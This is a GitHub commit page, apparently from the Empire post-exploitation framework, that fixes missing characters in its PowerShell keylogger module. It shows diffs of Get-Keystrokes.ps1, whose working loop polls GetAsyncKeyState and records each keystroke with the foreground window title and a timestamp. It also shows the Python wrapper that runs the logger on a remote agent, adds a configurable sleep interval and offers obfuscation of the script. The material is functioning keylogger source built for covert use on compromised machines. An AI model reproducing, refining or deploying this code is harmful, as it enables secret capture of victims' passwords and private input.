Skip to content

Commit

Permalink
Fix for missing keylogger characters (#252)
Browse files Browse the repository at this point in the history 
* Added sleep option to keystrokes module

* Fix forewindow delay for keylogger

* Added option for changing sleep time for keylogger

* Removed timer from ps1
  • Loading branch information
@Cx01N
Cx01N authored Jul 18, 2020
1 parent ed065e6 commit 4a9cec9
Show file tree
Hide file tree
Showing 2 changed files with 44 additions and 30 deletions.
36 changes: 22 additions & 14 deletions data/module_source/collection/Get-Keystrokes.ps1
View file
Original file line number Diff line number Diff line change
@@ -1,21 +1,27 @@
function Get-Keystrokes {
<#
.SYNOPSIS
Logs keys pressed, time and the active window (when changed).
Some modifications for Empire by @harmj0y.
PowerSploit Function: Get-Keystrokes
Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
Modifications: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.LINK
http://www.obscuresec.com/
http://www.exploit-monday.com/
#>
param
(
[Parameter(Mandatory = $False)]
[string]
$Sleep = 1
)

[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

Expand Down Expand Up @@ -107,14 +113,14 @@ function Get-Keystrokes {
$LastWindowTitle = ""

while ($true) {
Start-Sleep -Milliseconds 40
Start-Sleep -Milliseconds $Sleep
$gotit = ""
$Outout = ""

for ($char = 1; $char -le 254; $char++) {
$vkey = $char
$gotit = $ImportDll::GetAsyncKeyState($vkey)

if ($gotit -eq -32767) {

#check for keys not mapped by virtual keyboard
Expand Down Expand Up @@ -155,19 +161,21 @@ function Get-Keystrokes {
if ([Console]::CapsLock) {$Outout += '[Caps Lock]'}

$scancode = $ImportDll::MapVirtualKey($vkey, 0x3)

$kbstate = New-Object Byte[] 256
$checkkbstate = $ImportDll::GetKeyboardState($kbstate)

$mychar = New-Object -TypeName "System.Text.StringBuilder";
$unicode_res = $ImportDll::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)

#get the title of the foreground window
$TopWindow = $ImportDll::GetForegroundWindow()
$WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle

if ($unicode_res -gt 0) {
if ($WindowTitle -ne $LastWindowTitle){
#get the title of the foreground window
$TopWindow = $ImportDll::GetForegroundWindow()

if ($TopWindow -ne $LastTopWindow){
$LastTopWindow = $TopWindow
$WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle

# if the window has changed
$TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
$Outout = "`n`n$WindowTitle - $TimeStamp`n"
Expand All @@ -179,4 +187,4 @@ function Get-Keystrokes {
}
}
}
}
}
38 changes: 22 additions & 16 deletions lib/modules/powershell/collection/keylogger.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -15,24 +15,25 @@ def __init__(self, mainMenu, params=[]):

'Author': ['@obscuresec', '@mattifestation', '@harmj0y'],

'Description': ('Logs keys pressed, time and the active window (when changed) to the keystrokes.txt file. This file is located in the agents downloads directory Empire/downloads/<AgentName>/keystrokes.txt.'),
'Description': (
'Logs keys pressed, time and the active window (when changed) to the keystrokes.txt file. This file is located in the agents downloads directory Empire/downloads/<AgentName>/keystrokes.txt.'),

'Software': '',

'Techniques': ['T1056'],

'Background' : True,
'Background': True,

'OutputExtension' : None,

'NeedsAdmin' : False,
'OutputExtension': None,

'OpsecSafe' : True,
'NeedsAdmin': False,

'Language' : 'powershell',
'OpsecSafe': True,

'Language': 'powershell',

'MinLanguageVersion': '2',

'MinLanguageVersion' : '2',

'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1'
]
Expand All @@ -42,10 +43,15 @@ def __init__(self, mainMenu, params=[]):
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
'Agent': {
'Description': 'Agent to run module on.',
'Required': True,
'Value': ''
},
'Sleep': {
'Description': 'Sleep time [ms] between key presses. Shorter times may increase CPU usage on the target.',
'Required': False,
'Value': '1'
}
}

Expand All @@ -59,7 +65,6 @@ def __init__(self, mainMenu, params=[]):
if option in self.options:
self.options[option]['Value'] = value


def generate(self, obfuscate=False, obfuscationCommand=""):

# read in the common module source code
Expand All @@ -78,7 +83,7 @@ def generate(self, obfuscate=False, obfuscationCommand=""):

scriptEnd = "Get-Keystrokes "

for option,values in self.options.items():
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
Expand All @@ -88,7 +93,8 @@ def generate(self, obfuscate=False, obfuscationCommand=""):
scriptEnd += " -" + str(option) + " " + str(values['Value'])

if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)

Expand Down

0 comments on commit 4a9cec9

Please sign in to comment.